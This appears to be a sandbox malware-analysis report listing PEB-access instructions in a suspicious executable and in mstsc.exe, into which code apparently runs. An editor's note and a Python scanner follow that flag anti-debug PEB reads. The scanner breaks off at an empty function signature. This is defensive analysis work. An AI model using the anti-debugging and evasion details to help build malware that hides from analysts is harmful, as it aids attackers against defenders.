          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01914BAD mov eax, dword ptr fs:[00000030h]1_2_01914BAD
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01914BAD mov eax, dword ptr fs:[00000030h]1_2_01914BAD
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01914BAD mov eax, dword ptr fs:[00000030h]1_2_01914BAD
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B5BA5 mov eax, dword ptr fs:[00000030h]1_2_019B5BA5
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019653CA mov eax, dword ptr fs:[00000030h]1_2_019653CA
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019653CA mov eax, dword ptr fs:[00000030h]1_2_019653CA
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019237F5 mov eax, dword ptr fs:[00000030h]1_2_019237F5
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019103E2 mov eax, dword ptr fs:[00000030h]1_2_019103E2
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019103E2 mov eax, dword ptr fs:[00000030h]1_2_019103E2
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019103E2 mov eax, dword ptr fs:[00000030h]1_2_019103E2
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019103E2 mov eax, dword ptr fs:[00000030h]1_2_019103E2
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019103E2 mov eax, dword ptr fs:[00000030h]1_2_019103E2
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019103E2 mov eax, dword ptr fs:[00000030h]1_2_019103E2
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0190DBE9 mov eax, dword ptr fs:[00000030h]1_2_0190DBE9
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019A131B mov eax, dword ptr fs:[00000030h]1_2_019A131B
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0190F716 mov eax, dword ptr fs:[00000030h]1_2_0190F716
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0197FF10 mov eax, dword ptr fs:[00000030h]1_2_0197FF10
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0197FF10 mov eax, dword ptr fs:[00000030h]1_2_0197FF10
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B070D mov eax, dword ptr fs:[00000030h]1_2_019B070D
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B070D mov eax, dword ptr fs:[00000030h]1_2_019B070D
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0191A70E mov eax, dword ptr fs:[00000030h]1_2_0191A70E
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0191A70E mov eax, dword ptr fs:[00000030h]1_2_0191A70E
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E4F2E mov eax, dword ptr fs:[00000030h]1_2_018E4F2E
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E4F2E mov eax, dword ptr fs:[00000030h]1_2_018E4F2E
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0191E730 mov eax, dword ptr fs:[00000030h]1_2_0191E730
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B8B58 mov eax, dword ptr fs:[00000030h]1_2_019B8B58
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018EDB40 mov eax, dword ptr fs:[00000030h]1_2_018EDB40
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018FEF40 mov eax, dword ptr fs:[00000030h]1_2_018FEF40
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018EF358 mov eax, dword ptr fs:[00000030h]1_2_018EF358
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01913B7A mov eax, dword ptr fs:[00000030h]1_2_01913B7A
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01913B7A mov eax, dword ptr fs:[00000030h]1_2_01913B7A
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018EDB60 mov ecx, dword ptr fs:[00000030h]1_2_018EDB60
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018FFF60 mov eax, dword ptr fs:[00000030h]1_2_018FFF60
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B8F6A mov eax, dword ptr fs:[00000030h]1_2_019B8F6A
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0191D294 mov eax, dword ptr fs:[00000030h]1_2_0191D294
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0191D294 mov eax, dword ptr fs:[00000030h]1_2_0191D294
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0197FE87 mov eax, dword ptr fs:[00000030h]1_2_0197FE87
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0191FAB0 mov eax, dword ptr fs:[00000030h]1_2_0191FAB0
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E52A5 mov eax, dword ptr fs:[00000030h]1_2_018E52A5
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E52A5 mov eax, dword ptr fs:[00000030h]1_2_018E52A5
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E52A5 mov eax, dword ptr fs:[00000030h]1_2_018E52A5
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E52A5 mov eax, dword ptr fs:[00000030h]1_2_018E52A5
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E52A5 mov eax, dword ptr fs:[00000030h]1_2_018E52A5
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019646A7 mov eax, dword ptr fs:[00000030h]1_2_019646A7
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B0EA5 mov eax, dword ptr fs:[00000030h]1_2_019B0EA5
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B0EA5 mov eax, dword ptr fs:[00000030h]1_2_019B0EA5
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B0EA5 mov eax, dword ptr fs:[00000030h]1_2_019B0EA5
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018FAAB0 mov eax, dword ptr fs:[00000030h]1_2_018FAAB0
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018FAAB0 mov eax, dword ptr fs:[00000030h]1_2_018FAAB0
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B8ED6 mov eax, dword ptr fs:[00000030h]1_2_019B8ED6
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01928EC7 mov eax, dword ptr fs:[00000030h]1_2_01928EC7
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0199FEC0 mov eax, dword ptr fs:[00000030h]1_2_0199FEC0
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01912ACB mov eax, dword ptr fs:[00000030h]1_2_01912ACB
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019136CC mov eax, dword ptr fs:[00000030h]1_2_019136CC
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018F76E2 mov eax, dword ptr fs:[00000030h]1_2_018F76E2
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019116E0 mov ecx, dword ptr fs:[00000030h]1_2_019116E0
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01912AE4 mov eax, dword ptr fs:[00000030h]1_2_01912AE4
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018F8A0A mov eax, dword ptr fs:[00000030h]1_2_018F8A0A
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01903A1C mov eax, dword ptr fs:[00000030h]1_2_01903A1C
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0191A61C mov eax, dword ptr fs:[00000030h]1_2_0191A61C
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0191A61C mov eax, dword ptr fs:[00000030h]1_2_0191A61C
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018EC600 mov eax, dword ptr fs:[00000030h]1_2_018EC600
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018EC600 mov eax, dword ptr fs:[00000030h]1_2_018EC600
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018EC600 mov eax, dword ptr fs:[00000030h]1_2_018EC600
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01918E00 mov eax, dword ptr fs:[00000030h]1_2_01918E00
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019A1608 mov eax, dword ptr fs:[00000030h]1_2_019A1608
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018EAA16 mov eax, dword ptr fs:[00000030h]1_2_018EAA16
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018EAA16 mov eax, dword ptr fs:[00000030h]1_2_018EAA16
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E5210 mov eax, dword ptr fs:[00000030h]1_2_018E5210
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E5210 mov ecx, dword ptr fs:[00000030h]1_2_018E5210
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E5210 mov eax, dword ptr fs:[00000030h]1_2_018E5210
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E5210 mov eax, dword ptr fs:[00000030h]1_2_018E5210
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0199FE3F mov eax, dword ptr fs:[00000030h]1_2_0199FE3F
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018EE620 mov eax, dword ptr fs:[00000030h]1_2_018EE620
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01924A2C mov eax, dword ptr fs:[00000030h]1_2_01924A2C
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01924A2C mov eax, dword ptr fs:[00000030h]1_2_01924A2C
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01974257 mov eax, dword ptr fs:[00000030h]1_2_01974257
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E9240 mov eax, dword ptr fs:[00000030h]1_2_018E9240
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E9240 mov eax, dword ptr fs:[00000030h]1_2_018E9240
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E9240 mov eax, dword ptr fs:[00000030h]1_2_018E9240
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E9240 mov eax, dword ptr fs:[00000030h]1_2_018E9240
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018F7E41 mov eax, dword ptr fs:[00000030h]1_2_018F7E41
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018F7E41 mov eax, dword ptr fs:[00000030h]1_2_018F7E41
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018F7E41 mov eax, dword ptr fs:[00000030h]1_2_018F7E41
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018F7E41 mov eax, dword ptr fs:[00000030h]1_2_018F7E41
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018F7E41 mov eax, dword ptr fs:[00000030h]1_2_018F7E41
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018F7E41 mov eax, dword ptr fs:[00000030h]1_2_018F7E41
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019AEA55 mov eax, dword ptr fs:[00000030h]1_2_019AEA55
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019AAE44 mov eax, dword ptr fs:[00000030h]1_2_019AAE44
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019AAE44 mov eax, dword ptr fs:[00000030h]1_2_019AAE44
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018F766D mov eax, dword ptr fs:[00000030h]1_2_018F766D
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0190AE73 mov eax, dword ptr fs:[00000030h]1_2_0190AE73
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0190AE73 mov eax, dword ptr fs:[00000030h]1_2_0190AE73
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0190AE73 mov eax, dword ptr fs:[00000030h]1_2_0190AE73
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0190AE73 mov eax, dword ptr fs:[00000030h]1_2_0190AE73
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0190AE73 mov eax, dword ptr fs:[00000030h]1_2_0190AE73
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0192927A mov eax, dword ptr fs:[00000030h]1_2_0192927A
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0199B260 mov eax, dword ptr fs:[00000030h]1_2_0199B260
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0199B260 mov eax, dword ptr fs:[00000030h]1_2_0199B260
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B8A62 mov eax, dword ptr fs:[00000030h]1_2_019B8A62
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B0F0BF mov ecx, dword ptr fs:[00000030h]3_2_04B0F0BF
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B0F0BF mov eax, dword ptr fs:[00000030h]3_2_04B0F0BF
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B0F0BF mov eax, dword ptr fs:[00000030h]3_2_04B0F0BF
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B020A0 mov eax, dword ptr fs:[00000030h]3_2_04B020A0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B020A0 mov eax, dword ptr fs:[00000030h]3_2_04B020A0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B020A0 mov eax, dword ptr fs:[00000030h]3_2_04B020A0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B020A0 mov eax, dword ptr fs:[00000030h]3_2_04B020A0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B020A0 mov eax, dword ptr fs:[00000030h]3_2_04B020A0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B020A0 mov eax, dword ptr fs:[00000030h]3_2_04B020A0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B190AF mov eax, dword ptr fs:[00000030h]3_2_04B190AF
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AD9080 mov eax, dword ptr fs:[00000030h]3_2_04AD9080
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B53884 mov eax, dword ptr fs:[00000030h]3_2_04B53884
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B53884 mov eax, dword ptr fs:[00000030h]3_2_04B53884
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AE849B mov eax, dword ptr fs:[00000030h]3_2_04AE849B
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AD58EC mov eax, dword ptr fs:[00000030h]3_2_04AD58EC
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B914FB mov eax, dword ptr fs:[00000030h]3_2_04B914FB
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B56CF0 mov eax, dword ptr fs:[00000030h]3_2_04B56CF0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B56CF0 mov eax, dword ptr fs:[00000030h]3_2_04B56CF0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B56CF0 mov eax, dword ptr fs:[00000030h]3_2_04B56CF0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B6B8D0 mov eax, dword ptr fs:[00000030h]3_2_04B6B8D0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B6B8D0 mov ecx, dword ptr fs:[00000030h]3_2_04B6B8D0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B6B8D0 mov eax, dword ptr fs:[00000030h]3_2_04B6B8D0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B6B8D0 mov eax, dword ptr fs:[00000030h]3_2_04B6B8D0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B6B8D0 mov eax, dword ptr fs:[00000030h]3_2_04B6B8D0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B6B8D0 mov eax, dword ptr fs:[00000030h]3_2_04B6B8D0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04BA8CD6 mov eax, dword ptr fs:[00000030h]3_2_04BA8CD6
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AEB02A mov eax, dword ptr fs:[00000030h]3_2_04AEB02A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AEB02A mov eax, dword ptr fs:[00000030h]3_2_04AEB02A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AEB02A mov eax, dword ptr fs:[00000030h]3_2_04AEB02A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AEB02A mov eax, dword ptr fs:[00000030h]3_2_04AEB02A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B0BC2C mov eax, dword ptr fs:[00000030h]3_2_04B0BC2C
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B0002D mov eax, dword ptr fs:[00000030h]3_2_04B0002D
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B0002D mov eax, dword ptr fs:[00000030h]3_2_04B0002D
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B0002D mov eax, dword ptr fs:[00000030h]3_2_04B0002D
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B0002D mov eax, dword ptr fs:[00000030h]3_2_04B0002D
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B0002D mov eax, dword ptr fs:[00000030h]3_2_04B0002D
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B57016 mov eax, dword ptr fs:[00000030h]3_2_04B57016
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B57016 mov eax, dword ptr fs:[00000030h]3_2_04B57016
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B57016 mov eax, dword ptr fs:[00000030h]3_2_04B57016
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04BA4015 mov eax, dword ptr fs:[00000030h]3_2_04BA4015
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04BA4015 mov eax, dword ptr fs:[00000030h]3_2_04BA4015
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04BA740D mov eax, dword ptr fs:[00000030h]3_2_04BA740D
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04BA740D mov eax, dword ptr fs:[00000030h]3_2_04BA740D
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04BA740D mov eax, dword ptr fs:[00000030h]3_2_04BA740D
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B91C06 mov eax, dword ptr fs:[00000030h]3_2_04B91C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B91C06 mov eax, dword ptr fs:[00000030h]3_2_04B91C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B91C06 mov eax, dword ptr fs:[00000030h]3_2_04B91C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B91C06 mov eax, dword ptr fs:[00000030h]3_2_04B91C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B91C06 mov eax, dword ptr fs:[00000030h]3_2_04B91C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B91C06 mov eax, dword ptr fs:[00000030h]3_2_04B91C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B91C06 mov eax, dword ptr fs:[00000030h]3_2_04B91C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B91C06 mov eax, dword ptr fs:[00000030h]3_2_04B91C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B91C06 mov eax, dword ptr fs:[00000030h]3_2_04B91C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B91C06 mov eax, dword ptr fs:[00000030h]3_2_04B91C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B91C06 mov eax, dword ptr fs:[00000030h]3_2_04B91C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B91C06 mov eax, dword ptr fs:[00000030h]3_2_04B91C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B91C06 mov eax, dword ptr fs:[00000030h]3_2_04B91C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B91C06 mov eax, dword ptr fs:[00000030h]3_2_04B91C06
          Source: C:\Windows\SysWOW64\mstsc.exe, code functions that load the PEB pointer with "mov <reg>, dword ptr fs:[00000030h]" (function: register, occurrences):
          3_2_04B56C0A: eax, 4
          3_2_04AF746D: eax, 1
          3_2_04B92073: eax, 1
          3_2_04BA1074: eax, 1
          3_2_04B6C450: eax, 2
          3_2_04B0A44B: eax, 1
          3_2_04AF0050: eax, 2
          3_2_04B01DB5: eax, 3
          3_2_04B551BE: eax, 4
          3_2_04B061A0: eax, 2
          3_2_04B035A1: eax, 1
          3_2_04B569A6: eax, 1
          3_2_04BA05AC: eax, 2
          3_2_04B02990: eax, 1
          3_2_04AD2D8A: eax, 5
          3_2_04B0FD9B: eax, 2
          3_2_04AFC182: eax, 1
          3_2_04B02581: eax, 4
          3_2_04B0A185: eax, 1
          3_2_04B88DF1: eax, 1
          3_2_04ADB1E1: eax, 3
          3_2_04AED5E0: eax, 2
          3_2_04B9FDE2: eax, 4
          3_2_04B641E8: eax, 1
          3_2_04B56DC9: eax, 5; ecx, 1
          3_2_04B9E539: eax, 1
          3_2_04B5A537: eax, 1
          3_2_04B0513A: eax, 2
          3_2_04B04D3B: eax, 3
          3_2_04BA8D34: eax, 1
          3_2_04AF4120: eax, 4; ecx, 1
          3_2_04AE3D34: eax, 13
          3_2_04ADAD30: eax, 1
          3_2_04AD9100: eax, 3
          3_2_04ADC962: eax, 1
          3_2_04AFC577: eax, 2
          3_2_04ADB171: eax, 2
          3_2_04AFB944: eax, 2
          3_2_04B13D43: eax, 1
          3_2_04B53540: eax, 1
          3_2_04AF7D50: eax, 1
          3_2_04B0FAB0: eax, 1
          3_2_04AD52A5: eax, 5
          3_2_04B546A7: eax, 1
          3_2_04AEAAB0: eax, 2
          3_2_04BA0EA5: eax, 3
          3_2_04B0D294: eax, 2
          3_2_04B6FE87: eax, 1
          3_2_04AE76E2: eax, 1
          3_2_04B016E0: ecx, 1
          3_2_04B02AE4: eax, 1
          3_2_04BA8ED6: eax, 1
          3_2_04B18EC7: eax, 1
          3_2_04B8FEC0: eax, 1
          3_2_04B02ACB: eax, 1
          3_2_04B036CC: eax, 1
          3_2_04B8FE3F: eax, 1
          3_2_04ADE620: eax, 1
          3_2_04B14A2C: eax, 2
          3_2_04AE8A0A: eax, 1
          3_2_04B0A61C: eax, 2
          3_2_04ADC600: eax, 3
          3_2_04B08E00: eax, 1
          3_2_04B91608: eax, 1
          3_2_04AF3A1C: eax, 1
          3_2_04ADAA16: eax, 2
          3_2_04AD5210: eax, 3; ecx, 1
          3_2_04AE766D: eax, 1
          3_2_04B1927A: eax, 1
          3_2_04B8B260: eax, 2
          3_2_04BA8A62: eax, 1
          3_2_04AFAE73: eax, 5
          3_2_04B64257: eax, 1
          3_2_04B9EA55: eax, 1
          3_2_04AD9240: eax, 4
          3_2_04AE7E41: eax, 6
          3_2_04B9AE44: eax, 2
          3_2_04B04BAD: eax, 3
          3_2_04BA5BA5: eax, 1
          3_2_04B0B390: eax, 1
          3_2_04AE1B8F: eax, 2
          3_2_04B57794: eax, 3
          3_2_04B02397: eax, 1
          3_2_04B9138A: eax, 1
          3_2_04B8D380: ecx, 1
          3_2_04AE8794: eax, 1
          3_2_04B137F5: eax, 1
          3_2_04AFDBE9: eax, 1
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe, process token adjusted: Debug
          Source: C:\Windows\SysWOW64\mstsc.exe, process token adjusted: Debug
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe, memory allocated: page read and write | page guard
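          The fs:[00000030h] loads listed above are how 32-bit code fetches the PEB pointer out of the TEB. On its own that is not malicious (the loader, the CRT and a great many clean binaries do it), which is why the sandbox files them as informative rather than as a verdict. What separates a debugger check from ordinary module walking is the PEB field dereferenced next: BeingDebugged at PEB+0x02, NtGlobalFlag at PEB+0x68 and the heap flags reached through ProcessHeap at PEB+0x18 are anti-debug reads, while Ldr at PEB+0x0C is what import resolution and shellcode alike use to find loaded modules. The Python below is an added example by the editor, not code from the sample, from this report or from Joe Sandbox: it scans a raw 32-bit code blob for the instruction encodings of these reads, decodes the destination register, and classifies the following access. The code bytes it scans are constructed for the example.

```python
"""Static scan for the PEB reads a sandbox reports as "mov eax, dword ptr fs:[00000030h]".

Added example for this report; not code from the sample or from Joe Sandbox.
32-bit x86 only: in a 32-bit process FS points at the TEB, TEB+0x30 is the PEB
pointer and TEB+0x18 is the TEB's own linear address (NtTib.Self). 64-bit code
uses GS:[0x60] instead and is out of scope here."""
import re
from dataclasses import dataclass

REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

# 64 = FS segment override, then either the short "mov eax, moffs32" form (A1) or
# "mov r32, r/m32" (8B) with ModRM mod=00 rm=101, i.e. a 32-bit absolute displacement.
# ModRM for that form is 0x05 | (reg << 3): 05 0D 15 1D 25 2D 35 3D.
TEB_READ = re.compile(
    rb"\x64(?:\xA1|\x8B[\x05\x0D\x15\x1D\x25\x2D\x35\x3D])(?P<off>[\x18\x30])\x00\x00\x00"
)

# PEB fields commonly dereferenced right after fetching the pointer (32-bit PEB layout).
PEB_FIELDS = {0x0C: "Ldr", 0x10: "ProcessParameters", 0x18: "ProcessHeap", 0x68: "NtGlobalFlag"}
ANTI_DEBUG_FIELDS = {"BeingDebugged", "NtGlobalFlag", "ProcessHeap"}


@dataclass(frozen=True)
class TebRead:
    offset: int       # position of the instruction in the scanned bytes
    register: str     # destination register
    teb_field: str    # "ProcessEnvironmentBlock" (fs:[30h]) or "Self" (fs:[18h])
    next_field: str   # PEB field dereferenced by the following instruction, if recognised


def _peb_field_after(code: bytes, pos: int, reg: str) -> str:
    """Decode the instruction at pos if it dereferences [reg + disp8] in a form we know."""
    rm = REG32.index(reg)
    if rm == 4:                     # [esp+disp8] needs a SIB byte; not decoded here
        return "unknown"
    w = code[pos:pos + 4]

    def base_ok(modrm: int) -> bool:   # mod=01 (disp8) and r/m = the register just loaded
        return (modrm >> 6) == 1 and (modrm & 7) == rm

    if len(w) >= 4 and w[0] == 0x0F and w[1] == 0xB6 and base_ok(w[2]) and w[3] == 0x02:
        return "BeingDebugged"      # movzx r32, byte ptr [reg+2]
    if len(w) >= 3 and w[0] == 0x8A and base_ok(w[1]) and w[2] == 0x02:
        return "BeingDebugged"      # mov r8, byte ptr [reg+2]
    if len(w) >= 4 and w[0] == 0x80 and base_ok(w[1]) and ((w[1] >> 3) & 7) == 7 and w[2] == 0x02:
        return "BeingDebugged"      # cmp byte ptr [reg+2], imm8
    if len(w) >= 3 and w[0] == 0x8B and base_ok(w[1]):
        return PEB_FIELDS.get(w[2], f"PEB+0x{w[2]:02X}")   # mov r32, dword ptr [reg+disp8]
    return "unknown"


def find_teb_reads(code: bytes) -> list[TebRead]:
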